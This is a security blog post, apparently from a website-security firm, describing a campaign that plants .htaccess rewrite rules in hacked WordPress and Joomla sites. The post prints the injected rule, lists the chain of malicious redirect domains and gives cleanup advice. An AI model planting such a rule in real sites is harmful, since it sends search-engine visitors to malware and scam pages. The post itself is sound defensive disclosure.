Htaccess Redirection to Sweepstakesandcontestsinfo dot com

Last week we started to see a large increase in the number of sites compromised with a .htaccess redirection to http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555.

This domain has been used to distribute malware for a while (generally through javascript injections), but only in the last few days did we start seeing it being done via .htaccess.

* The malicious site(s) are not blacklisted by Google (or any major blacklist) at this time, so it makes spreading the malware pretty simple for the attackers.

This is what gets added to the .htaccess of the compromised sites:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*(msn|live|altavista|excite|ask|aol|google|mail|bing|yahoo).*$ [NC]
RewriteRule .* http://sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 [R,L]
</IfModule>


In short, anyone that visits the compromised sites from a search engine will get redirected (and some times have their personal computer compromised). This is what happens via the browser of the visitor:

  1. Visits compromised site by clicking from a search engine
  2. Browser is redirected to sweepstakesandcontestsinfo.com/nl-in.php?nnn=555 (and variations
  3. Browser is redirected to http://www4.personaltr-scaner.rr.nu/?gue5mx=i%2BrOmaqtppWomd%2FXxa.. (or www3.bustdy.in or www3.strongdefenseiz.in and variations)
  4. Browser is again redirected to http://rdr.cz.cc/go.php?6&uid=7&isRedirected=1 (and other domains)

From there, it can be sent to online surveys (http://www.nic.cz.cc/redir2/?http://surveyfinde.com/d/local-job-listings.net), malware websites, fake search engines, and pretty much anywhere else the attackers decide.

If your site is compromised, check your .htaccess to see if it was modified. If you are not sure, run a scan on your site here: http://sitecheck.sucuri.net


How are the sites getting hacked?

That’s a good question, we are seeing it being used in combination with timthumb.php attacks, and on outdated Joomla/WordPress sites.

So you have make sure all of your sites are updated to avoid getting reinfected, and ensure that if you use TimThumb, you’re using the latest and greatest (2.8.2).

Make sure to leave us comments below :)

Scan your website for free:
About David Dede

Sucuri Security bot (crazy work) - Malware research updates, sucuri news and more.